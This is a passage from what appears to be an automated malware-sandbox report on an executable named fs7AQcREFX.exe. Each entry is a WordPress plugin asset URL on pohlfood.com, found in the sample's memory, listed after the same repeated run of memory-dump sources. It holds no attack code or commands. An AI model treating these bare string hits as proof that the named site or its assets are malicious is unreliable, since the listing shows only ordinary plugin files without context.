00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.9.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/all.min.css?ver=3.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?ver
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=5.15.
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/v4-shims.min.css?ver=3.
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/font-awesome/js/v4-shims.min.js?ver=3.13
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.13.4
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/css/swiper.min.css?ver=5.3.6
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/css/main.css?ver=2.1.50
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/ooohboi-steroids-for-elementor/assets/js/ooohboi-steroids.js?
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/css/style.min.css?ver=1.0.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/pojo-accessibility/assets/js/app.min.js?ver=1.0.0
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/flipbook.style.css?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/css/font-awesome.css?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/embed.js?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.book3.min.js?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.min.js?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.pdfservice.min.js?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.swipe.min.js?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/flipbook.webgl.min.js?ver=3.25
                      Source: fs7AQcREFX.exe, 00000000.00000003.620591340.0000000003630000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.622846184.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.616572106.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495560428.0000000003530000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.619881231.00000000030C0000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.501507543.0000000000B40000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.617037965.0000000003020000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.495912933.0000000003A30000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.499317836.0000000003610000.00000004.00001000.00020000.00000000.sdmp, fs7AQcREFX.exe, 00000000.00000003.612632326.0000000004020000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://pohlfood.com/wp-content/plugins/real3d-flipbook/js/iscroll.min.js?ver=3.25
